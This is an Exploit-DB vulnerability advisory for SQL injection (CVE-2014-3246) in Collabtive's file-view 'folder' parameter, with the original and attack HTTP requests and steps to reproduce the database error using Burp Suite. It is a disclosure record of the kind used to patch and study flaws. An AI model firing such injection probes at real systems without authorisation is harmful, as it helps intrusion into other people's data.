Collabtive 1.2 - SQL Injection

EDB-ID:

33249




Platform:

PHP

Date:

2014-05-08


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Vulnerability title: SQL Injection / SQL Error message in Collabtive
application (CVE-2014-3246)
CVE: CVE-2014-3246 (cordinated with
Vendor: Collabtive
Product: Collabtive (Open Source Project Management Software)
Affected version: 1.12
Fixed version: 2.0
Reported by: Deepak Rathore
Severity: Critical
URL: http://[domain]/collabtive-12/managefile.php?action=showproject&id=2482
Affected Users: Authenticated users
Affected parameter(s): folder

Issue details: The folder parameter appears to be vulnerable to SQL
injection attacks. The payload 1%3d was submitted in the folder parameter,
and a database error message was returned. You should review the contents
of the error message, and the application's handling of other input, to
confirm whether a vulnerability is present.  The database appears to be
MySQL.

HTTP request:
GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1
Host: collabtive.o-dyn.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
Firefox/29.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.0.3
Referer:
http://xxx/managefile.php?action=showproject&id=2482
Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
Connection: keep-alive

Steps to replicate:
1. Login into application
2. Go to "Desktop" tab and click on "Add project"
3. Fill the project details in the project form and click on "Add" button
4. After creating a project go to "Files" tab and Intercept the request
5. At "manageajax.php" file, replace "folder" parameter value with "1%3d"
=====================
Original Request
=====================
GET /manageajax.php?action=fileview_list&id=2482&folder=0 HTTP/1.1
Host: collabtive.o-dyn.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
Firefox/29.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.0.3
Referer:
http://xxx/managefile.php?action=showproject&id=2482
Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
Connection: keep-alive
======================
Attack Request
======================
GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1
Host: collabtive.o-dyn.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
Firefox/29.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.0.3
Referer:
http://xxx/managefile.php?action=showproject&id=2482
Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
Connection: keep-alive
======================
6. Forward manipulated request to server and wait for response in browser
7. SQL Error message is the proof of vulnerability.

Tools used: Burp Suite proxy, Mozilla Firefox browser